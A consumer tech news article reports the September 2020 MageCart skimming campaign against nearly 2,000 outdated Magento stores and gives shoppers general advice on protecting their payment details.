It’s bad enough when an online platform like a social network or game gets hacked. But when an online store — and all of its customers’ payment information — finds its way into hackers’ hands, you have an absolute disaster in the making.
Cyberattacks on e-commerce websites are becoming more common each year. Some of them involved direct hacks of their victims, while others involve rigging websites to steal credit card details and personal data when shoppers type them. Tap or click here for a rundown on some of last year’s biggest eCommerce hacks.
And now, one of the biggest e-commerce hacks since 2015 has targeted a system that thousands of online stores rely on: Magento. Thanks to an issue with an outdated version, almost 2,000 stores were altered to steal credit card info from customers. Here’s how we think it happened, and what you can do to stay safe.
The ultimate MageCart attack?
A new report by researchers at Sanguine Security showed nearly 2,000 separate online stores were compromised in what it’s calling the largest automated MageCart campaign ever.
For those who don’t know, a MageCart attack involves compromising an online store so the check-out page will steal data typed in by customers — especially credit card details. Tap or click here for more details on how this cyberattack pattern works.
These websites all had one thing in common: A back-end system controlled by Magento, a powerful e-commerce platform owned by Adobe. The majority of the hacked sites were using an outdated model of Magento that lacked some of the security features included in the latest version. These flaws were exploited by hackers to carry out the attacks.
From September 11 through 14, 2020, Sanguine Security detected 1,904 Magento stores targeted by cyberattacks. These websites had malicious code injected into their check-out pages that would steal customer data and send it back to a URL controlled by hackers.
Although we don’t fully know what exploit the hackers used to attack victims, posts on a Dark Web forum dating back to August showed several Magento exploits on sale for upwards of $5,000. The sale was made to a grand total of 10 people, which may explain how these hackers were able to pull off such a coordinated effort.
Because Magento version 1 is considered an end-of-life product, this means there is no official support or patch. Merchants who rely on Magento should use this incident to switch to more secure options like Magento 2, which features more robust security.
I was shopping online over the weekend. Am I in trouble?
While there isn’t a public-facing list of every store affected by the hack, law enforcement does have access to names of the stores obtained by Sanguine Security. If you were affected by the hacks, expect a site owner to reach out to you about your status.
If you’re told that your data was leaked, take a moment to call your bank or credit card provider and let them know your information was compromised. That way, they’ll be able to stop any fraudulent charges that come in. You may also want to speak to a credit bureau and discuss a freeze on your credit for peace of mind. Tap or click here to see how to set up a credit freeze.
To protect yourself from MageCart attacks going forward, you must be vigilant and cautious. One of the things that makes these attacks so scary is they’re totally invisible unless you know code. But if you keep these factors in mind, you will be much safer:
- Shopping big vs shopping small: Small, independent stores are at higher risk for these kinds of attacks. Sites like Amazon, Walmart and Target dedicate huge portions of their budgets to cybersecurity, and as a result, are far less vulnerable.
- Use a go-between: Payment services like PayPal are one of the easiest ways to make secure transactions that won’t expose your data to MageCart attacks. When you check-out with PayPal, you’re actually redirected to pay through PayPal’s website. This means any malicious code hanging out from a MageCart attack can’t scan your information. Tap or click here to see the safest ways to pay online.
- Don’t save credit card details in your browser: If your system ever gets hacked or someone snoops on your machine, having credit or debit card numbers saved in your browser can turn into a nightmare. Tap or click here to find out how to remove saved payment card details from your browser.
In addition to these steps, the usual advice of strong passwords and two-factor authentication applies here. By forcing hackers to take an extra step to log in, you give yourself a chance to catch them in the act. Tap or click to set up two-factor authentication for the most popular platforms on the web.